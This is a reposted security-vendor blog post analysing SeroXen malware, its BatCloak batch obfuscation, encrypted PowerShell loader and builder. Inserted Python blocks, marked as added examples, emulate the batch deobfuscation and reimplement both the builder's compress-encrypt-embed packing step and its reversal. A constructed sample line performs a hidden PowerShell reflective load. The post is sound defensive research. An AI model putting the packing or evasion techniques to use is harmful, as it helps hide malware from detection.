{"id":52352,"date":"2023-06-15T00:00:00","date_gmt":"2023-06-15T00:00:00","guid":{"rendered":"urn:uuid:f9737388-14cb-98c5-9541-d1390b8eda74"},"modified":"2023-06-15T00:00:00","modified_gmt":"2023-06-15T00:00:00","slug":"seroxen-incorporates-latest-batcloak-engine-iteration","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/seroxen-incorporates-latest-batcloak-engine-iteration\/","title":{"rendered":"SeroXen Incorporates Latest BatCloak Engine Iteration"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/23\/seroxen-incorporates-latest-batcloak-engine-iteration.jpg\"> <body class=\"articlepage page basicpage context-business\" id=\"readabilityBody\" readability=\"50.334519572954\"> <\/p>\n<div class=\"root responsivegrid\">\n<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12 \">\n<div class=\"articleBodyNoHero aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"research-layout article container\" role=\"contentinfo\">\n<article class=\"research-layout--wrapper row\" data-article-pageid=\"787397878\">\n<div 
class=\"col-xs-12 col-md-12 one-column\">\n<div class=\"col-xs-12 col-md-12\" readability=\"9.3296812749004\">\n<div class=\"article-details\" role=\"heading\" readability=\"38.300796812749\"> <span class=\"article-details__bar\" role=\"img\"><\/span> <\/p>\n<p class=\"article-details__display-tag\">Malware<\/p>\n<p class=\"article-details__description\">We looked into the documented behavior of SeroXen malware and noted the inclusion of the latest iteration of the batch obfuscation engine BatCloak to generate a fully undetectable (FUD) .bat loader. This is the second part of a three-part series documenting the abuse of BatCloak\u2019s evasion capabilities and interoperability with other malware.<\/p>\n<p class=\"article-details__author-by\">By: Peter Girnus, Aliakbar Zahravi <time class=\"article-details__date\">June 15, 2023<\/time> <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<hr class=\"research-layout-divider\"> <main class=\"main--content col-xs-12 col-lg-8 col-lg-push-2\"> <\/p>\n<div class=\"richText\" readability=\"45.719396310788\">\n<div readability=\"39.051984348798\">\n<p>The recent rise of highly sophisticated malware that evades detection through fully undetectable (FUD) capabilities, low-cost financial accessibility, and minimal skill barriers has created a pervasive threat targeting online communities and organizations. One such malware, SeroXen, uses an advanced FUD technique built on highly obfuscated batch files to infect victims with hVNC (hidden virtual network computing)-capable malware.<\/p>\n<p>This entry is the second installment of a three-part series featuring the BatCloak engine, its iterations, and its inclusion in SeroXen malware as the main loading mechanism. 
The first entry, titled \u201c<a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/23\/f\/analyzing-the-fud-malware-obfuscation-engine-batcloak.html\">The Dark Evolution: Advanced Malicious Actors Unveil Malware Modification Progression<\/a>,\u201d looked into the beginnings and evolution of the BatCloak obfuscation engine. The third part of this series analyzes the distribution mechanism of SeroXen and BatCloak, including the security impact of FUD batch obfuscation and related insights. As of this writing, a quick online search for SeroXen returns top results for an official website and for social media and sharing pages with videos on how to use the remote access trojan (RAT) as if it were a legitimate tool. We will go over these dissemination strategies in the subsequent entry.<\/p>\n<p><span class=\"main-subtitle-black\"><span class=\"body-subhead-title\">SeroXen\u2019s FUD batch patterns<\/span><\/span><\/p>\n<p>To attain FUD status, SeroXen\u2019s obfuscation has gone through multiple layered iterations, evolving from notable predecessors such as Jlaive, BatCloak, CryBat, Exe2Bat, and ScrubCrypt. Notably, the author of these FUD tools is acknowledged as a contributor in various places, including attributions on the main SeroXen website and in forum posts authored by the individual behind SeroXen.<\/p>\n<p><span class=\"body-subhead-title\">Examining the SeroXen infection chain<\/span><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/f\/seroxen-incorporates-latest-batcloak-engine-iteration\/figure1-seroxen-incorporates-latest-batcloak-engine-iteration-infection-chain.jpg\" alt=\"fig1-seroxen-incorporates-latest-batcloak-engine-iteration\"><figcaption>Figure 1. 
SeroXen infection chain<\/figcaption><\/figure>\n<\/p><\/div>\n<div>\n<div class=\"richText\" readability=\"40.5\">\n<div readability=\"26\">\n<p>To initiate the infection process, the targeted user is lured into executing a batch file. These lures are often presented as software specific to enthusiast groups such as gaming communities, and the batch file\u2019s FUD capability makes the infection process more effective.<\/p>\n<p>We found a collection of malicious archives associated with cheats for prominent game titles. Each of these archives harbors a highly obfuscated batch file that serves as the infection vector initiating a SeroXen infection. Alarmingly, none of the archives was detected by any security solution. In most instances, these malicious archives are hosted on the Discord CDN (content delivery network) and cater to specific interested communities, but they could also be hosted on any number of cloud storage options as well as special interest forums.<\/p>\n<p>Figure 2 shows a SeroXen sample submitted to a public repository under the false pretense of being a popular online video game cheat; it illustrates the sample\u2019s comprehensive concealment capabilities. Across the samples we analyzed, SeroXen\u2019s obfuscated batch files consistently range from approximately 10MB to 15MB in size.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/f\/seroxen-incorporates-latest-batcloak-engine-iteration\/figure2-seroxen-incorporates-latest-batcloak-engine-iteration.jpg\" alt=\"fig2-seroxen-incorporates-latest-batcloak-engine-iteration\"><figcaption>Figure 2. 
Gaming lures with no detections<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33.5\">\n<div readability=\"12\">\n<p><b>Analyzing the obfuscation patterns deployed by SeroXen<\/b><\/p>\n<p>To develop a comprehensive understanding of the obfuscation algorithm used by SeroXen, we examined a large number of heavily obfuscated batch files. Figure 3 shows an obfuscated SeroXen batch payload camouflaged as a Fortnite hack.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/f\/seroxen-incorporates-latest-batcloak-engine-iteration\/figure3-seroxen-incorporates-latest-batcloak-engine-iteration.jpg\" alt=\"fig3-seroxen-incorporates-latest-batcloak-engine-iteration\"><figcaption>Figure 3. SeroXen obfuscated batch payload<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"39.5\">\n<div readability=\"24\">\n<p>The batch obfuscation patterns implemented by the SeroXen FUD algorithm can be summarized as follows:<\/p>\n<ol>\n<li>Suppression of console echo through the directive &#8220;@echo off&#8221;<\/li>\n<li>Use of string manipulation techniques (substring extraction from existing variables) to obfuscate the initial &#8220;set&#8221; command<\/li>\n<li>Assignment of the &#8220;set&#8221; command to a user-defined variable<\/li>\n<li>Assignment of the equals sign (&#8220;=&#8221;) to a user-defined variable<\/li>\n<li>Use of the variables from steps 3 and 4 to assign values to further user-defined variables<\/li>\n<li>Concatenation of those variables at the end of the obfuscation process to construct a command, which is then executed<\/li>\n<\/ol>\n<p>Furthermore, our investigation showed that layered obfuscation and superfluous code fragments, or &#8220;junk code&#8221;, are used to impede analysis of the batch file and hinder detection.<\/p>\n<p><b>Summary of commands executed during the SeroXen infection process<\/b><\/p>\n<p>We break down the core commands that are concatenated and executed to infect the victim as follows:<\/p>\n<ol>\n<li>Ensure all batch commands run are suppressed with \u201c@echo off\u201d<\/li>\n<li>Copy the PowerShell executable from <i>System32<\/i> to the current directory<\/li>\n<li>Set the current directory<\/li>\n<li>Name this copied PowerShell executable after the batch filename with an appended .exe, such as <i>&lt;mal_bat&gt;.exe<\/i><\/li>\n<li>Use the copied PowerShell executable to decrypt and execute the encrypted payload<\/li>\n<li>Build the final PowerShell command used to decrypt the final payload<\/li>\n<li>Use .NET static methods, invoked through PowerShell\u2019s static member operator (::), to decrypt the final payload<\/li>\n<\/ol>\n<p><b>Analyzing the deobfuscated SeroXen batch files<\/b><\/p>\n<p>During our technical analysis of FUD-enabled SeroXen batch payloads, we were able to deobfuscate the commands associated with its execution and patch key points in its operation to dump the deobfuscated version.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/f\/seroxen-incorporates-latest-batcloak-engine-iteration\/figure4-seroxen-incorporates-latest-batcloak-engine-iteration.jpg\" alt=\"fig4-seroxen-incorporates-latest-batcloak-engine-iteration\"><figcaption>Figure 4. Deobfuscated SeroXen batch payload<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33.5\">\n<div readability=\"12\">\n<p>If we compare the deobfuscated sample (Figure 4) with the highly obfuscated sample (Figure 3), we can see the core function of the batch script: to generate a series of set commands in an obfuscated manner to evade detection. 
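<\/p>\n<p>The six obfuscation patterns and the command summary above describe a loader that never writes the word set in the clear: it carves the letters out of an environment variable, stores set and the equals sign in variables of its own, and assembles every real command from those pieces. The Python below is an added example, not code from the original article or from SeroXen, that replays this pattern to recover the concatenated commands without running any of them. The sample batch text, its variable names, the lure file name lure and the PowerShell argument it ends with are all constructed for this example; the only facts about cmd it relies on are the %VAR:~start,len% substring syntax and that an unknown variable expands to nothing inside a batch file.<\/p>

```python
import re

# Constructed starting environment (not taken from a real sample). Loaders in
# this family carve single characters out of well-known variables with the
# cmd substring syntax %VAR:~start,len%; %ComSpec:~-16,1% is the 's' of
# 'system32' in C:\Windows\system32\cmd.exe.
BASE_ENV = {
    'COMSPEC': 'C:\\Windows\\system32\\cmd.exe',
    'SYSTEMROOT': 'C:\\Windows',
}

# %NAME%, %NAME:~START% or %NAME:~START,LEN%; delayed !expansion! is not modelled.
VAR_RE = re.compile('%([^%:]+)(?::~(-?\\d+)(?:,(-?\\d+))?)?%')
# set name=value and the quoted set form, which is how '=' itself gets stored.
SET_RE = re.compile('^set\\s+\"?([^=\"]+)=(.*?)\"?\\s*$', re.IGNORECASE)


def substring(value, start, length):
    '''cmd semantics: a negative start counts from the end of the value and a
    negative length drops that many trailing characters.'''
    s = int(start)
    s = s if s >= 0 else max(len(value) + s, 0)
    if length is None:
        return value[s:]
    n = int(length)
    return value[s:s + n] if n >= 0 else value[s:len(value) + n]


def expand(text, env):
    '''Resolve every %variable% reference; unknown names expand to nothing,
    exactly as they do inside a batch file.'''
    def repl(match):
        name, start, length = match.groups()
        value = env.get(name.upper(), '')
        return value if start is None else substring(value, start, length)
    return VAR_RE.sub(repl, text)


def emulate(batch_text, script_name='lure', env=None):
    '''Replay the batch file line by line: expand references, apply any line
    that resolves to a set command, and collect the commands that would run.
    Returns (commands, final_environment).'''
    env = dict(BASE_ENV if env is None else env)
    commands = []
    for raw in batch_text.splitlines():
        # %~n0 is the batch file name without extension; SeroXen names the
        # copied powershell.exe after it (mal_bat.exe in the article).
        line = expand(raw.strip().replace('%~n0', script_name), env)
        line = line.lstrip('@').strip()
        if not line or line.lower() == 'echo off':
            continue
        if line.startswith(':') or line.lower().startswith('rem '):
            continue  # labels and comments; a :: line may also carry the payload blob
        match = SET_RE.match(line)
        if match:
            env[match.group(1).strip().upper()] = match.group(2)
            continue
        commands.append(line)
    return commands, env


# Constructed sample in the style the article describes; the PowerShell
# argument stored in r is a stand-in for the real decrypt-and-load command.
SAMPLE_LINES = [
    '@echo off',
    'set \"s=%ComSpec:~-16,1%%ComSpec:~-12,1%%ComSpec:~-13,1%\"',
    '%s% \"e==\"',
    '%s% \"j%e%junk value that nothing ever reads\"',
    '%s% \"v%e%v1.0\"',
    '%s% \"p%e%%SystemRoot%\\System32\\WindowsPowerShell\\%v%\\powershell.exe\"',
    '%s% \"o%e%%~n0.exe\"',
    '%s% \"c%e%%ComSpec:~-7,1%opy\"',
    '%c% \"%p%\" \"%o%\"',
    '%s% \"r%e%-nop -w hidden -c [Reflection.Assembly]::Load($b).EntryPoint.Invoke($null,$null)\"',
    '\"%o%\" %r%',
]
SAMPLE_BAT = chr(10).join(SAMPLE_LINES)

if __name__ == '__main__':
    resolved, _ = emulate(SAMPLE_BAT)
    for command in resolved:
        print(command)
```

<p>Run as a script it prints two resolved commands: the copy of powershell.exe to lure.exe and the launch of that copy. The junk assignment costs nothing because a variable no command references is simply never expanded, which is why junk code inflates the file without changing what it does. On a real SeroXen batch file expect to extend this minimal emulator: it does not model delayed expansion, call-level indirection or every quoting rule of cmd, only the set-and-concatenate pattern listed above.<\/p>\n<p>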
We see the result of the numerous obfuscated set commands in its deobfuscated equivalent: throughout the obfuscated batch file, numerous variables are concatenated together and then executed.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/f\/seroxen-incorporates-latest-batcloak-engine-iteration\/figure5-seroxen-incorporates-latest-batcloak-engine-iteration.jpg\" alt=\"fig5-seroxen-incorporates-latest-batcloak-engine-iteration\"><figcaption>Figure 5. Deobfuscated SeroXen PowerShell commands<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<p><b>Analyzing the final PowerShell decryption command<\/b><\/p>\n<p>The PowerShell command executed by the FUD-obfuscated batch file is itself a sequence of hidden PowerShell commands that decrypt and deliver the .Net loader.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/f\/seroxen-incorporates-latest-batcloak-engine-iteration\/figure6-seroxen-incorporates-latest-batcloak-engine-iteration.jpg\" alt=\"fig6-seroxen-incorporates-latest-batcloak-engine-iteration\"><figcaption>Figure 6. Final PowerShell command executed in the SeroXen batch file<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"36.17681498829\">\n<div readability=\"18.577283372365\">\n<p>The deobfuscated sequence of PowerShell commands decrypts the payload and employs an <a href=\"https:\/\/attack.mitre.org\/techniques\/T1620\/\">assembly reflection<\/a> mechanism to load it reflectively. The essential steps of the final sequence of PowerShell commands are:<\/p>\n<ol>\n<li>Decode the payload using Base64<\/li>\n<li>Decrypt the payload using AES or XOR. 
In the case of AES:\n<ul>\n<li>Instantiate an AES decryption object in cipher block chaining (CBC) mode<\/li>\n<li>Use Base64-decoded blobs as the key and IV<\/li>\n<\/ul>\n<\/li>\n<li>Unzip the payload<\/li>\n<li>Reflectively load the payload<\/li>\n<\/ol>\n<p>Figure 7 shows how the C# loader is recovered from the deobfuscated batch file: the payload is Base64-decoded, AES-decrypted using the recovered key and IV, and finally gunzipped to reveal the .Net binary. That binary is then loaded into memory using reflection.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/f\/seroxen-incorporates-latest-batcloak-engine-iteration\/figure7-seroxen-incorporates-latest-batcloak-engine-iteration.png\" alt=\"fig7-seroxen-incorporates-latest-batcloak-engine-iteration\"><figcaption>Figure 7. Using Python to decrypt the .Net loader<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"31\">\n<div readability=\"7\">\n<p><span class=\"body-subhead-title\">Deep dive into SeroXen builder<\/span><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/f\/seroxen-incorporates-latest-batcloak-engine-iteration\/figure8-seroxen-incorporates-latest-batcloak-engine-iteration.png\" alt=\"fig8-seroxen-incorporates-latest-batcloak-engine-iteration\"><figcaption>Figure 8. 
Obfuscated builder<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"31.08488372093\">\n<div readability=\"11.13488372093\">\n<p>The SeroXen builder binary is protected with the Agile.NET obfuscator. Unpacking its functions and resources shows that SeroXen is a modified version of <a href=\"https:\/\/github.com\/quasar\/Quasar\">Quasar RAT<\/a> with a rootkit and other additions, such as the Jlaive loader builder and the BatCloak obfuscation engine, which together generate a FUD .bat loader. The evolution and technical analysis of Jlaive and BatCloak were discussed in <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/23\/f\/analyzing-the-fud-malware-obfuscation-engine-batcloak.html\">part 1 of this series<\/a>.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/f\/seroxen-incorporates-latest-batcloak-engine-iteration\/figure9-seroxen-incorporates-latest-batcloak-engine-iteration.jpg\" alt=\"fig9-seroxen-incorporates-latest-batcloak-engine-iteration\"><figcaption>Figure 9. Unpacked builder resources (left) and builder function names (right), showing a modified version of Quasar RAT in its arsenal<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/f\/seroxen-incorporates-latest-batcloak-engine-iteration\/figure10-seroxen-incorporates-latest-batcloak-engine-iteration.png\" alt=\"fig10-seroxen-incorporates-latest-batcloak-engine-iteration\"><figcaption>Figure 10. 
SeroXen builder adopting Jlaive and BatCloak source code<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33\">\n<div readability=\"11\">\n<p>As of this writing, SeroXen offers monthly and lifetime key options for purchase online, as well as instructions for using the RAT. We go over this in detail in the third installment of this series as part of the cybercriminals\u2019 distribution strategies.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/f\/seroxen-incorporates-latest-batcloak-engine-iteration\/figure11-seroxen-incorporates-latest-batcloak-engine-iteration.png\" alt=\"fig11-seroxen-incorporates-latest-batcloak-engine-iteration\"><figcaption>Figure 11. SeroXen builder usage instruction<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"34\">\n<div readability=\"13\">\n<p><span class=\"body-subhead-title\">SeroXen payload generation process<\/span><\/p>\n<p>Upon pressing the \u201cbuild\u201d button, the builder writes the user-given configuration into the pre-compiled file \u201c<i>client.bin<\/i>,\u201d which produces the Quasar RAT payload, and then passes that payload to a function called \u201c<i>Crypt<\/i>.\u201d<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/f\/seroxen-incorporates-latest-batcloak-engine-iteration\/figure12-seroxen-incorporates-latest-batcloak-engine-iteration.png\" alt=\"fig12-seroxen-incorporates-latest-batcloak-engine-iteration\"><figcaption>Figure 12. 
SeroXen vs Quasar RAT payload generation<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33\">\n<div readability=\"11\">\n<p>The Crypt function uses the Jlaive multi-stage loader generator and the BatCloak obfuscator source code to produce undetectable loaders. It first reads the Quasar RAT payload and verifies that it is a valid .NET assembly. Crypt then patches some strings and opcodes within the binary, encrypts it using AES in CBC mode, and saves it as \u201c<i>payload.exe<\/i>.\u201d<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/f\/seroxen-incorporates-latest-batcloak-engine-iteration\/figure13-seroxen-incorporates-latest-batcloak-engine-iteration.png\" alt=\"fig13-seroxen-incorporates-latest-batcloak-engine-iteration\"><figcaption>Figure 13. Payload encryption and obfuscation process<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"34\">\n<div readability=\"13\">\n<p>Much like the Jlaive crypter, the builder takes in the user configuration and produces the first loader. This is achieved using a C# template file, &#8220;<i>Quasar.Server.Stub.cs<\/i>,&#8221; embedded in its resources. The author has integrated extra functionality, such as API unhooking, into this adapted version of the Jlaive CreateCS function.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/f\/seroxen-incorporates-latest-batcloak-engine-iteration\/figure14-seroxen-incorporates-latest-batcloak-engine-iteration.png\" alt=\"fig14-seroxen-incorporates-latest-batcloak-engine-iteration\"><figcaption>Figure 14. 
Create C# loader<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"36.232854864434\">\n<div readability=\"18.606060606061\">\n<p><i>Apiunhooker.dll<\/i> is the open-source project \u201c<a href=\"https:\/\/github.com\/GetRektBoy724\/SharpUnhooker\">SharpUnhooker<\/a>,\u201d a C#-based universal API unhooker that automatically unhooks the API DLLs <i>ntdll.dll<\/i>, <i>kernel32.dll<\/i>, <i>advapi32.dll<\/i>, and <i>kernelbase.dll<\/i>. The technique attempts to evade user-land monitoring by antivirus and endpoint detection and response (EDR) solutions by cleansing or refreshing the API DLLs loaded in the process, which removes any user-land hooks those products placed in them.<\/p>\n<p>The builder subsequently compiles the C# loader stub, adding the necessary files and dependencies, such as the encrypted Quasar RAT (<i>payload.exe<\/i>) and SharpUnhooker (<i>Apiunhooker.dll<\/i>), to its resources.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/f\/seroxen-incorporates-latest-batcloak-engine-iteration\/figure15-seroxen-incorporates-latest-batcloak-engine-iteration.png\" alt=\"fig15-seroxen-incorporates-latest-batcloak-engine-iteration\"><figcaption>Figure 15. C# loader compilation<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"40.5\">\n<div readability=\"26\">\n<p>Next, the builder compresses the C# loader, encrypts it using AES or XOR (depending on the configuration), and encodes it in Base64. Finally, it creates a batch file and embeds the encoded C# loader in it. The decoding, decryption, and decompression steps are handled by an obfuscated PowerShell script, which is also appended to the batch file.<\/p>\n<p>The batch file&#8217;s role is to deobfuscate the PowerShell script and execute it. 
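<\/p>\n<p>The builder steps just described (compress, encrypt with AES or XOR, Base64-encode, embed in the batch file) are the mirror image of the four-step PowerShell decryption sequence listed after Figure 6, so one script can show both directions. The Python below is an added example, not code from the original article, from SeroXen or from Jlaive: pack() performs the builder side and unpack() the analyst side, reading the blob from the batch line that starts with ::. It uses the cryptography package for AES-CBC and assumes PKCS7 padding (the .NET default); the XOR stub is assumed to be a repeating-key XOR, since the article does not detail it; the loader bytes, key and IV are constructed placeholders, and the key and IV are passed in as the Base64 strings an analyst would lift from the deobfuscated PowerShell command.<\/p>

```python
import base64
import gzip

try:
    from cryptography.hazmat.primitives import padding
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    HAVE_AES = True
except ImportError:  # without the package only the XOR stub is available
    HAVE_AES = False

# Constructed stand-ins (not real SeroXen material): a fake .NET image that
# carries the MZ header and the BSJB metadata signature, plus a Base64 key
# and IV of the kind the deobfuscated PowerShell command exposes.
FAKE_LOADER = b'MZ' + bytes(62) + b'PE' + bytes(200) + b'BSJB' + b'placeholder loader body'
KEY_B64 = base64.b64encode(b'0123456789abcdef0123456789abcdef').decode('ascii')  # 32 bytes, AES-256
IV_B64 = base64.b64encode(b'fedcba9876543210').decode('ascii')  # 16 bytes, one AES block


def _aes_cbc(data, key, iv, encrypt):
    '''AES-CBC with PKCS7 padding, the combination an AES-in-CBC-mode
    PowerShell stub expects. Assumes the cryptography package is installed.'''
    if not HAVE_AES:
        raise RuntimeError('the AES stub needs the cryptography package')
    cipher = Cipher(algorithms.AES(key), modes.CBC(iv))
    if encrypt:
        padder = padding.PKCS7(128).padder()
        padded = padder.update(data) + padder.finalize()
        enc = cipher.encryptor()
        return enc.update(padded) + enc.finalize()
    dec = cipher.decryptor()
    padded = dec.update(data) + dec.finalize()
    unpadder = padding.PKCS7(128).unpadder()
    return unpadder.update(padded) + unpadder.finalize()


def _xor(data, key):
    '''Repeating-key XOR (assumed layout of the XOR stub); symmetric, so the
    same routine packs and unpacks.'''
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def pack(loader, mode, key_b64, iv_b64=None):
    '''Builder side, in the order the article gives: gzip, encrypt, Base64,
    then drop the blob into the batch file on a line starting with ::, which
    cmd treats as a label it never executes.'''
    key = base64.b64decode(key_b64)
    body = gzip.compress(loader)
    if mode == 'aes':
        body = _aes_cbc(body, key, base64.b64decode(iv_b64), encrypt=True)
    elif mode == 'xor':
        body = _xor(body, key)
    else:
        raise ValueError('mode must be aes or xor')
    blob = base64.b64encode(body).decode('ascii')
    return chr(10).join(['@echo off', '::' + blob, 'rem obfuscated launcher lines would follow'])


def extract_blob(batch_text):
    '''Find the value after the :: marker, as the PowerShell stub does.'''
    for line in batch_text.splitlines():
        if line.startswith('::'):
            return line[2:].strip()
    raise ValueError('no :: payload line in batch file')


def unpack(batch_text, mode, key_b64, iv_b64=None):
    '''Analyst side: Base64-decode, decrypt with the recovered key and IV,
    gunzip. Returns the loader bytes instead of reflectively loading them.'''
    body = base64.b64decode(extract_blob(batch_text))
    key = base64.b64decode(key_b64)
    if mode == 'aes':
        body = _aes_cbc(body, key, base64.b64decode(iv_b64), encrypt=False)
    elif mode == 'xor':
        body = _xor(body, key)
    else:
        raise ValueError('mode must be aes or xor')
    return gzip.decompress(body)


def looks_like_dotnet_pe(data):
    '''Cheap sanity check on the recovered stage: MZ header plus the BSJB
    signature that begins CLR metadata. Not a full PE parse.'''
    return data[:2] == b'MZ' and b'BSJB' in data


if __name__ == '__main__':
    bat = pack(FAKE_LOADER, 'xor', KEY_B64)
    recovered = unpack(bat, 'xor', KEY_B64)
    print(len(bat), 'byte batch file; recovered loader is .NET-like:', looks_like_dotnet_pe(recovered))
```

<p>With a real sample the mode, key and IV come from the deobfuscated PowerShell command the article\u2019s script exposes, and the output of unpack() is the C# loader that Figure 7 recovers. Nothing here executes the recovered bytes; that final reflective-load step is what the PowerShell stub does and what an analyst deliberately leaves out. Note the step order: the stub decodes, then decrypts, then decompresses, because the builder compressed first and encrypted second; running gunzip on still-encrypted bytes simply fails.<\/p>\n<p>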
This PowerShell script scans the content of the batch file for the value following &#8220;<i>::<\/i>&#8221;, extracts this value, decodes it, decrypts it, decompresses it (reversing the compress, encrypt, encode order in which the builder produced it), and finally executes it in memory.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/f\/seroxen-incorporates-latest-batcloak-engine-iteration\/figure16-seroxen-incorporates-latest-batcloak-engine-iteration.png\" alt=\"fig16-seroxen-incorporates-latest-batcloak-engine-iteration\"><figcaption>Figure 16. Creating and writing encrypted data to a batch file, and deleting temporary files<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/f\/seroxen-incorporates-latest-batcloak-engine-iteration\/figure17-seroxen-incorporates-latest-batcloak-engine-iteration.jpg\" alt=\"fig17-seroxen-incorporates-latest-batcloak-engine-iteration\"><figcaption>Figure 17. Generating an obfuscated batch loader (top) and PowerShell loader (bottom)<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33.5\">\n<div readability=\"12\">\n<p>Two PowerShell templates, &#8220;<i>Qusar.Server.AESStub.ps1<\/i>&#8221; and &#8220;<i>Quasar.Server.XORStub.ps1<\/i>,&#8221; exist in the resource section of the builder. Depending on the configuration, one of these is loaded and used.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/f\/seroxen-incorporates-latest-batcloak-engine-iteration\/figure18-seroxen-incorporates-latest-batcloak-engine-iteration.png\" alt=\"fig18-seroxen-incorporates-latest-batcloak-engine-iteration\"><figcaption>Figure 18. 
PowerShell stub<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"48.14437034131\">\n<div readability=\"45.366810513927\">\n<p><span class=\"body-subhead-title\">Conclusion<\/span><\/p>\n<p>In this entry, we include a <a href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/f\/seroxen-incorporates-latest-batcloak-engine-iteration\/Yara-rule-seroxen-incorporates-latest-batcloak-engine-iteration.txt\">YARA rule<\/a> that organizations and security teams can use to detect SeroXen obfuscated batch files. Additionally, here\u2019s a <a href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/23\/f\/seroxen-incorporates-latest-batcloak-engine-iteration\/PS-script-seroxen-incorporates-latest-batcloak-engine-iteration.txt\">PowerShell script<\/a> that can reveal the final deobfuscated batch file and the commands it would run.<i> <b>It is critically important that this PowerShell script be run in an isolated malware sandbox.<\/b> <\/i>The script deobfuscates the SeroXen batch file so that security teams can inspect its output file for the PowerShell command the deobfuscation routine would execute. From that command, the analyst can take the key and IV needed to decrypt the final payload.<\/p>\n<p>Overall, SeroXen is a full-featured remote administration tool (RAT) coded in C# and built from a combination of 